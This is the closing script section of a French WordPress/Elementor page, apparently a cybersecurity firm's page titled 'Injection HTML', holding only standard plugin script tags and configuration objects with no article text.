src="https://cycuri.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.20.2" id="elementor-frontend-modules-js"></script> <script src="https://cycuri.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2" id="wp-polyfill-inert-js"></script> <script src="https://cycuri.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0" id="regenerator-runtime-js"></script> <script src="https://cycuri.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script> <script src="https://cycuri.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script> <script src="https://cycuri.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef" id="wp-i18n-js"></script> <script id="wp-i18n-js-after">wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );</script> <script id="elementor-pro-frontend-js-before">var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/cycuri.com\/wp-admin\/admin-ajax.php","nonce":"0682b1d137","urls":{"assets":"https:\/\/cycuri.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/cycuri.com\/wp-json\/"},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"facebook_sdk":{"lang":"fr_FR","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/cycuri.com\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}};</script> <script src="https://cycuri.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.20.1" id="elementor-pro-frontend-js"></script> <script src="https://cycuri.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2" id="elementor-waypoints-js"></script> <script src="https://cycuri.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2" id="jquery-ui-core-js"></script> <script id="elementor-frontend-js-before">var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Partager sur Facebook","shareOnTwitter":"Partager sur Twitter","pinIt":"L\u2019\u00e9pingler","download":"T\u00e9l\u00e9charger","downloadImage":"T\u00e9l\u00e9charger une image","fullscreen":"Plein \u00e9cran","zoom":"Zoom","share":"Partager","playVideo":"Lire la vid\u00e9o","previous":"Pr\u00e9c\u00e9dent","next":"Suivant","close":"Fermer","a11yCarouselWrapperAriaLabel":"Carousel | Scroll horizontal: Fl\u00e8che gauche & droite","a11yCarouselPrevSlideMessage":"Diapositive pr\u00e9c\u00e9dente","a11yCarouselNextSlideMessage":"Diapositive suivante","a11yCarouselFirstSlideMessage":"Ceci est la premi\u00e8re diapositive","a11yCarouselLastSlideMessage":"Ceci est la derni\u00e8re diapositive","a11yCarouselPaginationBulletMessage":"Aller \u00e0 la diapositive"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Portrait mobile","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Paysage","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablette en mode portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablette en mode paysage","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Portable","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"\u00c9cran large","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.20.2","is_static":false,"experimentalFeatures":{"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"e_font_icon_svg":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"block_editor_assets_optimize":true,"ai-layout":true,"landing-pages":true,"e_lazyload":true,"e_image_loading_optimization":true,"notes":true,"form-submissions":true},"urls":{"assets":"https:\/\/cycuri.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":1430,"title":"Injection%20HTML%20-%20Cycuri%20-%20Services%20en%20Cybers%C3%A9curit%C3%A9","excerpt":"","featuredImage":false}};</script> <script src="https://cycuri.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.20.2" id="elementor-frontend-js"></script> <script src="https://cycuri.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.20.1" id="pro-elements-handlers-js"></script> <script id="jet-sticky-frontend-js-extra">var JetStickySettings = {"elements_data":{"sections":[],"columns":[]}};</script> <script src="https://cycuri.com/wp-content/plugins/jetsticky-for-elementor/assets/js/jet-sticky-frontend.js?ver=1.0.4" id="jet-sticky-frontend-js"></script> </body></html> <!-- Cache served by breeze CACHE - Last modified: Thu, 21 Mar 2024 05:32:10 GMT -->